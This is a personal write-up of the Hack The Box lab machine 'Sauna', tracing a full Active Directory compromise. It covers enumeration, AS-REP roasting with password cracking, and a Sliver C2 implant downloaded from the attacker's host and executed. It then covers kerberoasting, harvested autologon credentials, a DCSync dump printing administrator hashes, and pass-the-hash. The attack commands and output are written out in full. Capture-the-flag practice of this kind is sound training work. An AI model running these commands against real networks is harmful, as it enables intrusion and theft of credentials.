Sauna - Writeup - Konstantinovitz

## Summary --- ## Unauthenticated External Access ### Remote Service Enumeration ```sh nmap -sV -sC -T4 -vvv -oN remote-services-base.nmap $RHOST nmap -p- -sV -vvv -oN remote-services-all-ports.nmap $RHOST ``` ### SMB - 445 | Check | Value | Command | | -------------- | ------------------------------------------ | ---------------------------------------- | | Null Sessions? | true | `nxc smb $RHOST -u '' -p ''` | | SMBv1 | false | | | signing | true | | | domain | egotistical-bank.local | | | name | sauna | | | enum shares? | false | `nxc smb $RHOST -u '' -p '' --shares` | | [[RID Brute]] | false | `nxc smb $RHOST -u '' -p '' --rid-brute` | | guest account? | false | `nxc smb $RHOST -u '' -p ''` | | vulns? | | | | OS | Windows 10 / Server 2019 Build 177763 x 64 | | Don't appear to give us much love here... vulnerability enumeration: ```sh nxc smb $RHOST -u '' -p '' -M spooler -M zerologon -M smbghost -M ms17-010 -M printnightmare ``` - suffers [[Zerolgon Vulnerability]] ### LDAP - anon bind? permitted - users? can list ```sh # no usable results ldapsearch -x -H ldap://$RHOST -s base -b "DC=egotistical-bank,DC=local" "(objectclass=*)" > ldap-base.txt # yields no usable results ldapsearch -x -H ldap://$RHOST -b "DC=egotistical-bank,DC=local" "(objectClass=user)" > ldap-users.out # reveals a single user nxc ldap $RHOST --users CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL ``` ### WAPP - 80 HTTP - appears custom - appears to be 100% static - is served by [[Microsoft IIS - TODO]] #### Directory enumeration ```sh gobuster dir --wordlist ~/arsenal/wordlists/raft-large-directories.txt --url http://$RHOST ``` reveals little of interest... #### Team & Users ![[Pasted image 20250206183326.png]] The following page http://10.10.10.175/about.html reveals a list of employees in the company. Let's attempt to generate a user list formatted in a variety of ways and then use [[Kerbrute]] to "spray" the usernames. Generated a variety of these usernames which may be found in `$TNAME/creds/user_guesses.txt`. Running [[Kerbrute]]: ```sh kerbrute userenum -d egotistical-bank.local --dc $RHOST ./user_guesses.txt ``` returned a hit on `fsmith` - wrote that to `$THOME/creds/users.txt`. ### [[AS-REP Roasting]] `fsmith` ``` GetNPUsers.py 'egotistical-bank.local/' -dc-ip $RHOST -usersfile users.txt -format hashcat Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [email protected]:33dbb3668cf1e2d2b1d91a76bb57982b$340de4aa3c5856dd6c9b396da27f5123694d0c162c6aa65d11025a184fa5b49d8fc5f507fc486ba4770922a75541ed22dbd380a2e0a6119cc200ff38e0b89f49c7a656cc3347a03965426abff45ec44832550fb9f93d6cdc87a806a869fd3f1622797e90b64dfd1c1c1bb8cf4cdb68d6efaf3c4f3d2e13aaab2e79558ded8ec40eacd51b34a3a532ebb45d1b6dc9c16b753aadfe707f45e1736a5cd3a4f14a3d09864ed46efa1036d3f2f573fb2e89b61ebd35a5924cf9ccc1f7d58a8546ee6d8cb5a3c8862467433d6eaeca43b00ea0f9e7af504c5c2d51425df2427de331d1f28fd445d982e9e68c1cb0527db2e66a16db823339a3fa2f85617c50b646c4f2 ``` noice - [[AS-REP Roasting]] returns a hash which we may crack using [[Hashcat - Hash Cracking]]: ```sh hashcat -m 18200 -a 0 fsmith-AS-REP.hash ~/arsenal/wordlists/rockyou.txt --force # yields Thestrokes23 ``` --- ## Authenticated External Access - `fsmith` Setting up a new folder for housekeeping ```sh [λ]- [fsmith]-> cat .envrc source_up export USER=fsmith export PASS=Thestrokes23 ``` Let the re-enumeration begin... ### SMB #### Shares ![[Pasted image 20250206191424.png]] Something of note, there's a printer here, which is unusual, and our previous enumeration revealed that the [[Print Spooler Service]] was enabled. Furthermore, the e[SYSVOL SMB Share]] is now accessible. ### [[WinRM - 5986 HTTP]] A quick check reveals that we got access. ```sh [λ]- [fsmith]-> nxc winrm $RHOST -u $USER -p $PASS WINRM 10.10.10.175 5985 SAUNA [*] Windows 10 / Server 2019 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) WINRM 10.10.10.175 5985 SAUNA [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 (Pwn3d!) ``` We connect using [[Evil-WinRM]]: ```sh [λ]- [fsmith]-> evil-winrm -i $RHOST -u $USER -p $PASS ``` Aaaaaaaand we're in --- ## Authenticated Internal Access - `fsmith` I wanna start off by improving my foothold by adding a [[Sliver C2]] agent as these come pre-packaged with all the tooling I need. ```sh sliver > generate --os windows --http 10.10.14.7 --skip-symbols [*] Implant saved to /home/noctua/targets/sauna/fsmith/THICK_ENERGY.exe ``` We download it to the target using: ```powershell *Evil-WinRM* PS C:\Users\FSmith\Documents> curl http://10.10.14.7:8000/THICK_ENERGY.exe -o agent.exe .\agent.exe ``` We're now locked and loaded to proceed with further lateral movement and privesc. ### [[Kerberoasting]] ### [[BloodHound]] We'll go ahead and execute the following commands from within our [[Sliver C2]] session: ```sliver sharp-hound-3 # produces 20250206182833_BloodHound.zip download 20250206182833_BloodHound.zip ``` We now got the graph data on our local attacker machine, we proceed by uploading it to the Bloodhound browser GUI. #### [[Kerberoasting]] ![[Pasted image 20250206201503.png]] ```sliver rubeus -- kerberoast [*] rubeus output: ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.3.2 [*] Action: Kerberoasting [*] NOTICE: AES hashes will be returned for AES-enabled accounts. [*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts. [*] Target Domain : EGOTISTICAL-BANK.LOCAL [*] Searching path 'LDAP://SAUNA.EGOTISTICAL-BANK.LOCAL/DC=EGOTISTICAL-BANK,DC=LOCAL' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' [*] Total kerberoastable users : 1 [*] SamAccountName : HSmith [*] DistinguishedName : CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL [*] ServicePrincipalName : SAUNA/HSmith.EGOTISTICALBANK.LOCAL:60111 [*] PwdLastSet : 1/22/2020 9:54:34 PM [*] Supported ETypes : RC4_HMAC_DEFAULT [X] Error during request for SPN SAUNA/HSmith.EGOTISTICALBANK.LOCAL:[email protected] : No credentials are available in the security package ``` running `klist` inside the Evil-WinRM session yields `Cached Tickets: 0` indicating that there's no [[Kerberos - AD - TODO]] ticket available in the current session. #### [[DCSync Attack]] - We discover that a [[AD - Service Account]] has [[DCSync Attack]]. ![[Pasted image 20250206200857.png]] If we can get to `svc_loanmgr` we'll be gucci.... ### [[Windows Privesc Methodolgy]] - running [[Winpeas]] (how can we get colored output going in evil-winrm?) - `AppCmd.exe` was found - only interesting with Administrative privileges. - Found `AutoLogon credentials`: ``` Some AutoLogon credentials were found DefaultDomainName : EGOTISTICALBANK DefaultUserName : EGOTISTICALBANK\svc_loanmanager DefaultPassword : Moneymakestheworldgoround! ``` ## Lateral movement `fsmith->svc_loanmanager` **Credentials:** `svc_loanmgr:Moneymakestheworldgoround!` Previous Bloodhound enumeration revealed that `svc_loanmanager` had `CanPSRemote` meaning that we can fire up another [[Evil-WinRM]] shell. ## Lateral movement `svc_loanmanager`->`Administrator` As previously noted, `svc_loanmgr` has the `DCSync` #AD-priv which enabled us to perform a [[DCSync Attack]]: ```sh [λ]- [svc_loanmanager]-> secretsdump.py 'egotistical-bank.local'/'svc_loanmgr':'Moneymakestheworldgoround!'@'10.10.10.175' Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e::: ... [*] Kerberos keys grabbed Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657 Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e Administrator:des-cbc-md5:fb8f321c64cea87f ... ``` We attempt a [[Pass The Hash Attack (PTH) - TODO]]: ```sh evil-winrm -i $RHOST -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e ``` Aaaand we're in. --- ## Lessons Learned - had to look up tipz on getting usernames... - need to get colored output for winpeas + evilwinrm - pulled down winpeas.exe binaries to my attacker machine, they worked like a charm. - missed the winpeas privesc vector somehow... - the output got lost in information noise, tweaked my [[Winpeas]] cheatsheet to include command flags that reduces and focuses the output. - needed a hint to get the `GetNPUsers` command syntax correct - just got more drills in - refined my reporting and note taking structure - used this box as an occasion to reorganize some workflow and scripting stuffs --- ## Reference - IPPsecs video and writeup...